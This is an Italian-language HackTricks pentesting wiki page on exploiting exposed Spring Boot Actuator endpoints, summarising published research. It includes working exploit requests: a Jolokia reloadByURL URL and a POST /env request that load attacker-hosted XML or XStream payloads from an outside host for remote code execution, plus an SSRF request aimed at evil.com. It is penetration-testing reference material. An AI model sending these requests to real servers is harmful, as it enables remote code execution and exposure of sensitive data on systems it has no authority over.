hacktricks/network-services-pentesting/pentesting-web/spring-actuators.md

Spring Actuators

Impara l'hacking AWS da zero a eroe con htARTE (Esperto Red Team AWS di HackTricks)!

Altri modi per supportare HackTricks:

• Se vuoi vedere la tua azienda pubblicizzata su HackTricks o scaricare HackTricks in PDF Controlla i PIANI DI ABBONAMENTO!
• Ottieni il merchandising ufficiale di PEASS & HackTricks
• Scopri La Famiglia PEASS, la nostra collezione di NFT esclusivi
• Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @carlospolopm.
• Condividi i tuoi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repository di Github.

Bypass di Autenticazione Spring

Da https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png****

Sfruttare gli Attuatori di Spring Boot

Controlla il post originale da [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]

Punti Chiave:

• Gli Attuatori di Spring Boot registrano endpoint come /health, /trace, /beans, /env, ecc. Nelle versioni da 1 a 1.4, questi endpoint sono accessibili senza autenticazione. Dalla versione 1.5 in poi, solo /health e /info non sono sensibili per impostazione predefinita, ma spesso gli sviluppatori disabilitano questa sicurezza.
• Alcuni endpoint degli Attuatori possono esporre dati sensibili o consentire azioni dannose:
• /dump, /trace, /logfile, /shutdown, /mappings, /env, /actuator/env, /restart, e /heapdump.
• In Spring Boot 1.x, gli attuatori sono registrati sotto l'URL radice, mentre in 2.x sono sotto il percorso di base /actuator/.

Tecniche di Sfruttamento:

1. Esecuzione di Codice Remoto tramite '/jolokia':

• L'endpoint dell'attuatore /jolokia espone la libreria Jolokia, che consente l'accesso HTTP a MBeans.
• L'azione reloadByURL può essere sfruttata per ricaricare le configurazioni di logging da un URL esterno, il che può portare a XXE cieco o Esecuzione di Codice Remoto tramite configurazioni XML artigianali.
• URL di exploit di esempio: http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml.

2. Modifica della Configurazione tramite '/env':

• Se sono presenti le librerie Spring Cloud, l'endpoint /env consente la modifica delle proprietà ambientali.
• Le proprietà possono essere manipolate per sfruttare vulnerabilità, come la vulnerabilità di deserializzazione XStream nel serviceURL di Eureka.
• Esempio di richiesta POST di exploit:

POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream

3. Altre Impostazioni Utili:

• Proprietà come spring.datasource.tomcat.validationQuery, spring.datasource.tomcat.url, e spring.datasource.tomcat.max-active possono essere manipolate per vari sfruttamenti, come l'SQL injection o l'alterazione delle stringhe di connessione al database.

Informazioni Aggiuntive:

• Un elenco completo degli attuatori predefiniti può essere trovato qui.
• L'endpoint /env in Spring Boot 2.x utilizza il formato JSON per la modifica delle proprietà, ma il concetto generale rimane lo stesso.

Argomenti Correlati:

1. RCE di Env + H2:

• Dettagli sull'esplorazione della combinazione dell'endpoint /env e del database H2 possono essere trovati qui.

2. SSRF su Spring Boot Attraverso un'Interpretazione Errata del Nome del Percorso:

• La gestione dei parametri di matrice (;) del framework Spring nei nomi dei percorsi HTTP può essere sfruttata per Server-Side Request Forgery (SSRF).
• Esempio di richiesta di exploit:

GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close